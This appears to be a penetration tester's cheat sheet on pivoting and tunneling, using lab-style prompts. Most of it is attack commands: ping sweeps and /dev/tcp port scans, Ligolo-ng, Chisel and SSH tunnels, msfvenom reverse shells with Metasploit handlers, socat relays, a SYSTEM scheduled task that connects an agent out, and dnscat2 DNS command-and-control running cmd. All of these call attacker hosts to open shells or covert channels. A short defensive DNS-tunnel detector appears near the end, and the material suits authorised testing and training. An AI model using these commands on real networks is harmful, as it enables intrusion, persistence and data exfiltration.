# Portforwarding and tunneling

## **Commands to enumerate internal networks**

```powershell
PS C:\> Get-NetNeighbor -AddressFamily IPv4
PS C:\> Test-NetConnection -ComputerName 192.168.210.13 -Port 443
PS C:\> Test-WSMan -ComputerName 192.168.1.10
PS C:\> arp -a
PS C:\> route print
```

```sh
Intrusionz3r0X@htb[/htb]$ arp -n
Intrusionz3r0X@htb[/htb]$ route -4
```

## **Ping Sweep**

```sh
Intrusionz3r0X@htb[/htb]$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
C:\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\> 1..254 | % { $ip="192.168.210.$_"; if (Test-Connection -Count 1 -ComputerName $ip -Quiet) { "$ip`: True" } }
meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
```

### Port Scanning if ICMP is blocked

```sh
#Bash-only TCP connect scan using /dev/tcp (no ICMP needed)
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo "$i is open"; done
```

## Ligolo NG

```sh
#Start the proxy server
Intrusionz3r0X@htb[/htb]$ sudo ./proxy -selfcert -laddr 10.10.14.3:443

#Create the interface
ligolo-ng >> interface_create --name "ligolo" #In the ligolo-ng proxy console

#Connect the agent to our proxy server
Target@htb[/htb]$ ./agent -connect <ip-address>:<port> -ignore-cert

#Switch between sessions
ligolo-ng >> session

#Check the network configuration and identify the subnet
ligolo-ng >> ifconfig

#Create the route entry
ligolo-ng >> interface_add_route --name ligolo --route x.x.x.x/24 #In the ligolo-ng proxy console

#Start the tunnel
ligolo-ng >> tunnel_start --tun ligolo
```

### Configure double pivoting

For each additional pivot, create a new interface and specify the subnet to reach: /24 for the whole subnet or /32 for a single host.

Note: the **--addr** listener port has to increase by one for each additional tunnel, which keeps the tunnels easy to manage.

```sh
#Create a new interface for the new pivot host
ligolo-ng >> interface_create --name "ligolo2" #In the ligolo-ng proxy console

#Set up the listener on the first pivot (agent) that relays to the proxy
ligolo-ng >> listener_add --addr 0.0.0.0:1160x --to 127.0.0.1:11601 --tcp
ligolo-ng >> listener_list
Target@htb[/htb]$ ./agent -connect <subnet-ip-address-previous-pivot>:11601 -ignore-cert

#Switch between sessions
ligolo-ng >> session

#Check the network configuration and identify the subnet
ligolo-ng >> ifconfig

#Start the tunnel
ligolo-ng >> tunnel_start --tun ligolo2

#Create the route entry
ligolo-ng >> interface_add_route --name ligolo2 --route x.x.x.x/xx #In the ligolo-ng proxy console
```

**For unstable Sessions:**

```powershell
#Windows: scheduled task that starts the agent as SYSTEM one minute from now
schtasks /create /tn "MyAgentTask3" /tr "C:\Temp\agent.exe -connect 192.168.110.51:9000 -ignore-cert" /sc once /st (Get-Date).AddMinutes(1).ToString("HH:mm") /ru SYSTEM
```

```sh
#Linux: detach the agent from the current shell so it survives session loss
nohup ./agent -connect 192.168.110.55:9001 -ignore-cert > agent.log 2>&1 &
```

## Chisel

```sh
#The Chisel server on the pivot listens on port 1234 with SOCKS5 enabled (--socks5); the client's socks endpoint forwards traffic to every network reachable from the pivot host.
target@WEB01:~$ ./chisel server -v -p 1234 --socks5
Intrusionz3r0X@htb[/htb]$ ./chisel client -v 10.129.202.64:1234 socks

#If a firewall restricts inbound connections to the pivot, use reverse tunneling
Intrusionz3r0X@htb[/htb]$ sudo ./chisel server --reverse -v -p 1234 --socks5
target@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socks
```

### Chisel double pivoting


Kali Linux:

```sh
#Setting up the server
❯ ./chisel server --reverse --socks5 -p 9001 -v #Intrusionz3r0 Machine
```

Modify the proxychains configuration (**/etc/proxychains.conf**):

```conf
#Add one line at a time, as each pivot comes up; otherwise the proxy does not work
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090

#Close any other SOCKS4 proxy (e.g. an SSH dynamic port forward) and comment out its line in /etc/proxychains.conf
#socks4 127.0.0.1 9050
```

Pivot Host:

```powershell
#Connect back to the Kali server (opens SOCKS on Kali:1080), then serve the next hop
PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe client -v <KaliIP>:9001 R:socks
PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe server -v -p 9002 --reverse --socks5
```

Pivot Host 2:

```powershell
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\chisel.exe client PivotHostIP:9002 R:1090:socks
```

## Scan an entire IP list in one line

```sh
Target@htb[/htb]$ wget https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
Target@htb[/htb]$ chmod +x nmap
Target@htb[/htb]$ cat alive_host.txt
192.168.110.1
192.168.110.51
192.168.110.52
192.168.110.53
192.168.110.54
192.168.110.55
Target@htb[/htb]$ cat alive_host.txt | while read ip; do (./nmap -p- --open -Pn -n -T5 --min-rate 3000 -vvv -oG "${ip}_tcp_allports" $ip);done
```

## **Local Port Forwarding over SSH**

```sh
#Local Port Forwarding over SSH
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

#Dynamic SSH tunneling over SOCKS proxy
Intrusionz3r0X@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64 
```

## **Remote/Reverse Port Forwarding with SSH**

```sh
#Remote/Reverse Port Forwarding with SSH
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
msf6 exploit(multi/handler) > run

#Pivot port 8080 on its internal interface is forwarded back to the handler on 8000
Intrusionz3r0X@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

#Then execute the payload on the internal host
```

## **Meterpreter Tunneling & Port Forwarding**

```bash
#Meterpreter Tunneling & Port Forwarding
Intrusionz3r0X@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
#(Ctrl+Z to background the session and return to the msf6 prompt)

#Configuring MSF's SOCKS Proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run

#Creating Routes with AutoRoute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run

#It is also possible to add routes by running autoroute from the Meterpreter session.
meterpreter > run autoroute -s 172.16.5.0/23

#Listing Active Routes with AutoRoute
meterpreter > run autoroute -p

#Port Forwarding (local 3300 -> 172.16.5.19:3389 through the session)
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
#Reverse Port Forwarding (target-side 8081 -> attack host 10.10.14.18:1234)
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
```

## Socat

<https://github.com/tech128/socat-1.7.3.0-windows>

```bash
#Starting Socat Listener
ubuntu@Webserver:~$ socat TCP4-LISTEN:<intermediaryHostPort>,fork TCP4:10.10.14.18:<AttackhostPort>

#Socat Reverse shell
target@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:443
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 -f exe -o exploit.exe LPORT=8080
```

## **SSH Pivoting with Sshuttle**

```sh
Intrusionz3r0X@htb[/htb]$ sudo apt-get install sshuttle
Intrusionz3r0X@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 <ip-range> -v 
```

## RPivot

```sh
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/klsecservices/rpivot.git
Intrusionz3r0X@htb[/htb]$ sudo apt-get install python2.7

#Alternative way to install python2.7
Intrusionz3r0X@htb[/htb]$ curl https://pyenv.run | bash
Intrusionz3r0X@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ source ~/.bashrc
Intrusionz3r0X@htb[/htb]$ pyenv install 2.7
Intrusionz3r0X@htb[/htb]$ pyenv shell 2.7

#Running server.py from the Attack Host
Intrusionz3r0X@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

#Running client.py on the pivot to create the SOCKS tunnel
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
#NTLM Authentication (if the internal network uses an HTTP proxy with NTLM authentication)
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>
```

## **Port Forwarding with Windows Netsh**

```powershell
C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\Windows\system32> netsh.exe interface portproxy show v4tov4
```

## **DNS Tunneling with Dnscat2**

**DNS Tunneling with Dnscat2**: Dnscat2 is a tool that tunnels data through the DNS protocol over an encrypted command-and-control (C2) channel. By embedding data within DNS TXT records, it enables stealthy communication between an attacker's server and a compromised host. Because almost every network must allow DNS out, this traffic can pass firewalls and intrusion detection systems that do not inspect DNS content, making it a potent tool for exfiltrating data and maintaining covert remote control over compromised systems.

```sh
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/iagox86/dnscat2.git
Intrusionz3r0X@htb[/htb]$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

#DNSCAT2 for Windows
Intrusionz3r0X@htb[/htb]$ git clone https://github.com/lukebaggett/dnscat2-powershell.git
PS C:\htb> Import-Module .\dnscat2.ps1
PS C:\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd
```
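The flip side of the Dnscat2 paragraph is what the channel looks like to the resolver: one client issuing a stream of TXT queries whose left-most label is long, random-looking encoded data under a single domain. The detector below is an added example (not code from this page or from the dnscat2 project) that profiles resolver log lines per (client, base domain) and flags that pattern; the log format, the "last two labels" domain heuristic and the thresholds are assumptions, and the log lines are constructed.

```python
import math
from collections import defaultdict

# Constructed resolver log, format assumed as "<timestamp> <client> <qtype> <qname>".
# Client 10.0.0.7 mimics a dnscat2-style channel over TXT records under one domain.
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.0.0.5 A www.example.com
2024-05-01T10:00:02 10.0.0.5 A mail.example.com
2024-05-01T10:00:02 10.0.0.5 TXT _dmarc.example.com
2024-05-01T10:00:03 10.0.0.5 AAAA www.example.com
2024-05-01T10:00:04 10.0.0.5 A cdn.example.com
2024-05-01T10:00:03 10.0.0.7 TXT 0f1e2d3c4b5a69788796a5b4c3d2e1f0.inlanefreight.local
2024-05-01T10:00:03 10.0.0.7 TXT 7b8c9d0e1f2a3b4c5d6e7f8091a2b3c4.inlanefreight.local
2024-05-01T10:00:04 10.0.0.7 TXT d4e5f60718293a4b5c6d7e8f9a0b1c2d.inlanefreight.local
2024-05-01T10:00:04 10.0.0.7 TXT 3c2b1a0f9e8d7c6b5a4938271605f4e3.inlanefreight.local
2024-05-01T10:00:05 10.0.0.7 TXT 8a7b6c5d4e3f20119283746556473829.inlanefreight.local
2024-05-01T10:00:05 10.0.0.7 TXT e1f2a3b4c5d6e7f8091a2b3c4d5e6f70.inlanefreight.local
"""

def shannon_entropy(s: str) -> float:
    """Bits per character; encoded payload labels score far above hostnames."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0

def base_domain(qname: str) -> str:
    """Last two labels stand in for the registered domain (simplifying assumption)."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def payload_label(qname: str) -> str:
    """Left-most label, where a tunnel encodes its outbound data; '' for bare domains."""
    labels = qname.rstrip(".").split(".")
    return labels[0] if len(labels) > 2 else ""

def profile_dns_log(lines, min_queries=5, txt_ratio=0.5, min_len=20, min_entropy=3.0):
    """Aggregate per (client, base domain); flag tunnel-like profiles (thresholds assumed)."""
    agg = defaultdict(lambda: {"n": 0, "txt": 0, "len": 0, "ent": 0.0})
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue                      # skip malformed lines instead of crashing
        _, client, qtype, qname = parts
        a, label = agg[(client, base_domain(qname))], payload_label(qname)
        a["n"] += 1; a["txt"] += int(qtype.upper() == "TXT")
        a["len"] += len(label); a["ent"] += shannon_entropy(label)
    report = {}
    for key, a in agg.items():
        n, ratio, avg_len, avg_ent = a["n"], a["txt"] / a["n"], a["len"] / a["n"], a["ent"] / a["n"]
        report[key] = {"queries": n, "txt_ratio": round(ratio, 2), "avg_label_len": round(avg_len, 1),
                       "avg_entropy": round(avg_ent, 2), "suspicious": n >= min_queries
                       and ratio >= txt_ratio and avg_len >= min_len and avg_ent >= min_entropy}
    return report

def suspicious_pairs(lines, **kw):
    """Sorted (client, base domain) pairs whose profile matches the tunnel heuristic."""
    return sorted(k for k, v in profile_dns_log(lines, **kw).items() if v["suspicious"])
```

Run `suspicious_pairs(SAMPLE_LOG.splitlines())` to see only the noisy client flagged while the benign client, which also issued one legitimate TXT query, stays clear. In production the same three signals (record-type ratio, label length, label entropy) are what a DNS analytics rule or RPZ-fed alert would key on, tuned against a baseline of the organisation's own lookups.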

## ICMP Tunneling

```sh
#Build a statically linked binary so the tunnel tool runs on the pivot without matching shared libraries
go build --ldflags '-linkmode external -extldflags "-static"'
```
